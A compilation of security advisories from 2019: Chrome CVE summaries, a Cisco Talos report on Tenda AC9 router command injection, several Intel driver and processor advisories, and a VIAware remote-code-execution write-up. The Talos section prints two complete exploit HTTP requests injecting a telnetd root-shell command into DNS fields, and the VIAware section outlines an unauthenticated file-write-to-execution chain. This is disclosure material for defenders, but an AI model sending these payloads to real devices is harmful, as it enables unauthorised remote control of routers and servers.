Insufficient policy enforcement in service workers in Google Chrome prior to 78.0.3904.70 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page.

CVE-2019-13716

Insufficient validation of untrusted input in Omnibox in Google Chrome prior to 78.0.3904.70 allowed a remote attacker to perform domain spoofing via IDN homographs via a crafted domain name.

CVE-2019-13715

Use after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

About Monorail User Guide Release Notes Feedback on Monorail Terms Privacy

CVE-2019-13720: 1019226 - chromium - An open-source project to help move the web forward.

CVE-2019-13720

An exploitable command injection vulnerability exists in the /goform/WanParameterSetting functionality of Tenda AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Route (AC9V1.0 Firmware V15.03.05.16multiTRU). A specially crafted HTTP POST request can cause a command injection in the DNS1 post parameters, resulting in code execution. An attacker can send HTTP POST request with command to trigger this vulnerability.

**Summary**

An exploitable command injection vulnerability exists in the /goform/WanParameterSetting functionality of Tenda AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Route (AC9V1.0 Firmware V15.03.05.16\_multi\_TRU). A specially crafted HTTP POST request can cause a command injection, resulting in code execution. An attacker can send HTTP POST request with command to trigger this vulnerability.

**Tested Versions**

AC9V1.0 Firmware V15.03.05.16\_multi\_TRU AC9V1.0 Firmware V15.03.05.14\_EN

**Product URLs**

AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Router

**CVSSv3 Score**

7.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78: Improper Neutralization of Special Elements usedin an OS Command (‘OS Command Injection’)

**Details**

Tenda AC9 is one of the popular and low cost Smart Dual-Band Gigabit WiFi Router available on many of the online shopping sites like Amazon.

There exists command injection vulnerability in /goform/WanParameterSetting resource. Local authenticated attacker can include arbritary commands to post parameters to execute commands on the Tenda AC9 routerThe attacker can get reverse shell running as root using this commnad injection.

**CVE-2019-5071 - Command injection in the DNS1 post parameters**

The dns1 post parameter in the /goform/WanParameterSetting resource is vulnerable to a command injection attack.

The exploitable POST request is shown below

     POST /goform/WanParameterSetting?0.07019495213352056 HTTP/1.1
     Host: 10.10.10.1
     Content-Length: 193
     Accept: */*
     Origin: http://10.10.10.1
     X-Requested-With: XMLHttpRequest
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     Referer: http://10.10.10.1/main.html
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9
     Cookie: password=4ea6455c8fe5c3303df84083935a69b5lnu23f
     Connection: close
    
     wanType=0&adslUser=&adslPwd=&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=&mask=&gateway=&dns2=8.8.8.8&dns1=%3Btelnetd%20%2Dl%2Fbin%2Fsh%20%2Dp4444%3B&module=wan1
    

**CVE-2019-5072 - Command injection in the DNS2 post parameters**

The dns1 post parameter in the /goform/WanParameterSetting resource is vulnerable to a command injection attack.

The exploitable POST request is shown below

     POST /goform/WanParameterSetting?0.07019495213352056 HTTP/1.1
     Host: 10.10.10.1
     Content-Length: 193
     Accept: */*
     Origin: http://10.10.10.1
     X-Requested-With: XMLHttpRequest
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     Referer: http://10.10.10.1/main.html
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9
     Cookie: password=4ea6455c8fe5c3303df84083935a69b5lnu23f
     Connection: close
    
     wanType=0&adslUser=&adslPwd=&vpnServer=&vpnUser=&vpnPwd=&vpnWanType=1&dnsAuto=0&staticIp=&mask=&gateway=&dns1=8.8.8.8&dns2=%3Btelnetd%20%2Dl%2Fbin%2Fsh%20%2Dp4444%3B&module=wan1
    

**Timeline**

2019-07-29 - Initial contact  
2019-08-07 - Sent plain text file  
2019-10-02 - 60+ day follow up  
2019-10-21 - 90 day follow up  
2019-11-21 - Public Release

Discovered by Amit N. Raut of Cisco Talos.

CVE-2019-5071: TALOS-2019-0861 || Cisco Talos Intelligence Group

Pointer corruption in the Unified Shader Compiler in Intel(R) Graphics Drivers before 10.18.14.5074 (aka 15.36.x.5074) may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2019.2 IPU – Intel® Graphics Driver for Windows\* and Linux Advisory**

Intel ID:

INTEL-SA-00242

Advisory Category:

Software

Impact of vulnerability:

Escalation of Privilege, Denial of Service, Information Disclosure

Severity rating:

HIGH

Original release:

11/12/2019

Last revised:

11/12/2019

**Summary: **

Potential security vulnerabilities in Intel® Graphics Driver for Windows\* and Linux may allow denial of service.  Intel is releasing software updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2019-11112

Description: Memory corruption in Kernel Mode Driver in Intel(R) Graphics Driver before 26.20.100.6813 (DCH) or 26.20.100.6812 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.8 High

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2019-0155

Description: Insufficient access control in a subsystem for Intel (R) processor graphics in 6th, 7th, 8th and 9th Generation Intel(R) Core(TM) Processor Families; Intel(R) Pentium(R) Processor J, N, Silver and Gold Series; Intel(R) Celeron(R) Processor J, N, G3900 and G4900 Series; Intel(R) Atom(R) Processor A and E3900 Series; Intel(R) Xeon(R) Processor E3-1500 v5 and v6, E-2100 and E-2200 Processor Families; Intel(R) Graphics Driver for Windows\* before 26.20.100.6813 (DCH) or 26.20.100.6812 and before 21.20.x.5077 (aka15.45.5077), i915 Linux Driver for Intel(R) Processor Graphics before versions 5.4-rc7, 5.3.11, 4.19.84, 4.14.154, 4.9.201, 4.4.201 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.8 High

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2019-11111

Description: Pointer corruption in the Unified Shader Compiler in Intel(R) Graphics Drivers before 10.18.14.5074 (aka 15.36.x.5074) may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.3 High

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVEID: CVE-2019-14574

Description: Out of bounds read in a subsystem for Intel(R) Graphics Driver versions before 26.20.100.7209 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

CVEID: CVE-2019-14590  

Description: Improper access control in the API for the Intel(R) Graphics Driver versions before 26.20.100.7209 may allow an authenticated user to potentially enable information disclosure via local access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

CVEID: CVE-2019-14591

Description: Improper input validation in the API for Intel(R) Graphics Driver versions before 26.20.100.7209 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

CVEID: CVE-2019-11089

Description: Insufficient input validation in Kernel Mode module for Intel(R) Graphics Driver before version 25.20.100.6519 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 5.9 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:N/I:N/A:H

CVEID: CVE-2019-11113  

Description: Buffer overflow in Kernel Mode module for Intel(R) Graphics Driver before version 25.20.100.6618 (DCH) or 21.20.x.5077 (aka15.45.5077) may allow a privileged user to potentially enable information disclosure via local access.

CVSS Base Score: 4.0 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L

**Affected Products:**

6th, 7th, 8th, and 9th Gen Intel® Core™ processor family & 6th Gen Intel® Core™ processor family systems running Windows\* 7 or Windows\* 8.1 with Intel® Graphics Driver for Windows\* before 26.20.100.6813 (DCH) or 26.20.100.6812 and before 21.20.x.5077 (aka15.45.5077).

4th Generation Intel® Core™/ Pentium®/ Xeon® (E3 v3 only) Processors systems running Windows\* 7 or Windows\* 8.1 with Intel® Graphics Driver for Windows\* before versions 10.18.14.5074 (aka 15.36.x.5074).

**Recommendations:**

Intel recommends updating the Intel® Graphics Driver for Windows\* and i915 Linux Driver to the latest version.

Windows\* Driver updates are available for download at this location: https://downloadcenter.intel.com/product/80939/Graphics-Drivers  

For i915 Linux Driver updates to mitigate CVE-2019-0155, contact your Linux OS Vendor.

**Acknowledgements:**

Intel would like to thank Piotr Bania of Cisco TALOS (CVE-2019-14574), 

SSD Secure Disclosure / Ori Nimron / @orinimron123 (CVE-2019-11112) and Rancho Han of Tencent Security ZhanluLab (CVE-2019-11111) for reporting these issues and working with us on coordinated disclosure.

The additional issues were found internally by Intel employees.  Intel would like to thank Artem Shishkin, Edgar Barbosa, Gabriel Barbosa, Gustavo Scotti, Kekai Hu, Rodrigo Axel Monroy, and Rodrigo Branco.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/12/2019

Initial Release

1.1

11/12/2019  

Added Linux for CVE-2019-0155  

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2019-11111: INTEL-SA-00242

Improper invalidation for page table updates by a virtual guest operating system for multiple Intel(R) Processors may allow an authenticated user to potentially enable denial of service of the host system via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2019.2 IPU – Intel® Processor Machine Check Error Advisory**

**Summary: **

A potential security vulnerability in some Intel® Processors may allow denial of service. Intel has coordinated with OS and hypervisor vendors to provide updates which will mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2018-12207

Description: Improper invalidation for page table updates by a virtual guest operating system for multiple Intel(R) Processors may allow an authenticated user to potentially enable denial of service of the host system via local access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H

**Affected Products:**

A list of impacted products can be found here.

**Recommendations:**

To mitigate this vulnerability, operating system and hypervisor vendors will be providing software updates. Please contact your operating system vendor for additional details.

Additional Advisory Guidance on CVE-2018-12207 available here.

**Acknowledgements:**

The following issue was found internally by Intel. Intel would like to thank Deepak Gupta.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/12/19

Initial Release

1.1

09/29/20

Updated Affected Products

1.2

05/11/2021

Added CVE Additional Guidance Link

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2018-12207: INTEL-SA-00210

Improper conditions check in the voltage modulation interface for some Intel(R) Xeon(R) Scalable Processors may allow a privileged user to potentially enable denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2019.2 IPU – Intel® Xeon® Scalable Processors Voltage Setting Modulation Advisory**

**Summary: **

A potential security vulnerability in some Intel® Xeon® Scalable Processors may allow denial of service.  Intel is releasing firmware updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2019-11139

Description:  Improper conditions check in the voltage modulation interface for some Intel(R) Xeon(R) Scalable Processors may allow a privileged user to potentially enable denial of service via local access.

CVSS Base Score:  5.8 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:N/I:L/A:H

**Affected Products:**

Intel® Xeon® Scalable Processors:

*   Intel® Xeon® Platinum Processors: 8153, 8156, 8158, 8160, 8160F, 8160M, 8160T, 8164, 8168, 8170, 8170M, 8176, 8176F, 8176M, 8180, 8180M
*   Intel® Xeon® Gold Processors: 5115, 5118, 5119T, 5120, 5120T, 5122, 6126, 6126F, 6126T, 6128, 6130, 6130F, 6130T, 6132, 6134, 6134M, 6136, 6138, 6138F, 6138T, 6140, 6140M, 6142, 6142F, 6142M, 6144, 6146, 6148, 6148F, 6150, 6152, 6154  
    
*   Intel® Xeon® Silver Processors: 4108, 4109T, 4110, 4112, 4114, 4114T, 4116, 4116T  
    
*   Intel® Xeon® Bronze Processors: 3104, 3106  
    

**Recommendations:**

Intel recommends that users of the Intel® Xeon® Scalable Processors listed above update to the latest firmware version provided by the system manufacturer that addresses these issues.

If the system configuration is believed to be untrusted, it is recommended that the firmware update only be applied through the BIOS.

**Acknowledgements:**

This issue was found internally by Intel.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/12/2019

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2019-11139: INTEL-SA-00271

TSX Asynchronous Abort condition on some CPUs utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2019.2 IPU – TSX Asynchronous Abort Advisory**

**Summary: **

A potential security vulnerability in TSX Asynchronous Abort (TAA) for some Intel® Processors may allow information disclosure.  Intel is releasing firmware updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID:  CVE-2019-11135

Description:  TSX Asynchronous Abort condition on some CPUs utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access.

CVSS Base Score: 6.5 Medium

CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

**Affected Products: **

This issue affects all current processors that support Intel© TSX unless IA32\_ARCH\_CAPABILITIES.TAA\_NO (bit 8)=1. On CPUs affected by MDS, where IA32\_ARCH\_CAPABILITIES.MDS\_NO (bit 5)=0, the existing MDS mitigations will also mitigate against TAA. 

A list of impacted products can be found here.

**Recommendations:  
**

Intel recommends that users of the affected Intel® Processors listed above, update to the latest firmware version provided by the system manufacturer that addresses these issues.

For additional microcode information about the affected products, see here for the generic list of latest microcode updates including those for Intel-SA-00270.  

Additional technical details about TAA can be found here.

Additional Advisory Guidance on CVE-2019-11135 available here.

**Acknowledgements:**

Intel would like to thank the following individuals for finding and reporting the vulnerability to us via coordinated disclosure.

Intel thanks VU Amsterdam, CISPA to coordinate disclosure of TAA after the initial publication of their RIDL paper.  

VUSec group at VU Amsterdam: Stephan van Schaik, Alyssa Milburn, Sebastian Österlund, Pietro Frigo, Kaveh Razavi, Herbert Bos, Cristiano Giuffrida. 

CISPA Helmholtz Center for Information Security: Giorgi Maisuradze.

Intel thanks TU Graz and KU Leuven to coordinate disclosure of TAA after the initial publication of their ZombieLoad paper.  

Graz University of Technology: Moritz Lipp, Michael Schwarz, Daniel Gruss. 

KU Leuven: Jo Van Bulck.

Researchers from VUSec group at VU Amsterdam and CISPA Helmholtz Center provided Intel with a Proof of Concept (POC) in September 2018 and researchers from TU Graz and Ku Leuven provided Proof of Concept (POC) in April 2019. Intel subsequently confirmed each submission demonstrates TAA individually.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available. 

**Revision History**

Revision

Date

Description

1.0

11/12/2019  

Initial Release

1.1

11/12/2019

Updated Affected Products & Microcode References

1.2

12/03/2019

Updated Affected Products

1.3

04/21/2020

Updated Affected Products

1.4

09/29/2020

Updated Affected Products

1.5

05/11/2021

Added CVE Additional Guidance Link

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2019-11135: INTEL-SA-00270

Kramer VIAware 2.5.0719.1034 has Incorrect Access Control.

**Exploit Title: KRAMER VIAware 2.5.0719.1034 - Remote Code Execution**

Date: 2019-10-02  
Author: Andrew Hess  
Software Link: https://www.kramerav.com/us/product/viaware  
Version: 2.5.0719.1034  
CVE: CVE-2019-17124  

**History**

2019.10.02 - Vulnerability discovered  
2019.10.02 - Initial contact with the vendor  
2019.10.04 - Second contact with the vendor  
2019.10.08 - No reply from the vendor  
2019.10.09 - Public security advisory released  

**Software description**

All the advanced wireless presentation and collaboration tools offered by VIA Campus can now be used on your own PC to enhance collaborative meetings in Corporate environments and interactive learning in Education and training environments. From any laptop or mobile device, any in-room meeting participant or trainee can view the main display, edit documents together in real time, share any size file, turn the main display into a digital whiteboard, and more. VIAware also lets facilitators use e-polling and e-exams to easily and instantly measure how much students & trainees are actually learning. VIAware can show up to six user screens on one main display or up to 12 screens on two displays (hardware-dependent) and features iOS mirroring for MacBook, iPad, and iPhone as well as native mirroring for Chromebook, Android (Lollipop OS 5.0 or newer), and Windows phone. Remote students can easily join the class and collaborate in real time with embedded 3rd-party video conferencing and office apps. VIAware delivers the same security offered by all VIA devices and can be installed on any computer running Windows 10, providing IT managers the versatility they need. The software works seamlessly with your existing VIA clients and VIA Site Management and offers full support for all VIA Quick Connect features, such as QR Code, NFC Tag and VIA Pad. VIAware is available as a one-time license with optional annual upgrade subscriptions or as a recurring annual subscription.

**Exploit description**

The VIAware software is installed on a gateway computer that can have two network cards.  
One network card for the internal network and one for the external network (access point) to which the guests connect.

This scenario makes it dangerous because unblocked services can be attacked from the external network.

In our scenario, the web service can be attacked from the external network if it is not blocked by a firewall rule.

The web service is used to make the VIAapp software available to guests.

**Design**

**POC****Check for VIAware Webservice**

**Call the vulnerable website (https://viaware/browseSystemFiles.php?path=C:\\Windows&icon=browser). This site is only for admins, but does not check the session correctly and lets anonymous users on the site.**

**Through this site we can already collect information about the server. But there is more.**

**The rev="string" variable can be adjusted arbitrarily on the client side. This is the string that is written to a file.**

**In our test we put a demo string**

**We can also specify any file in which this script will be written. So it is possible to place shellcode (value="string")**

**Now trigger the action with one click e.g. on notepad.exe  
**

**On server side the file was created with content  
**

**If we have put an exploit.cmd script into the apache cgi-bin folder, we can execute the script arbitrarily from a browser call.**

**In the standard installation the Apache service runs in the SYSTEM context and executes the scripts as SYSTEM.**

Tag

#chrome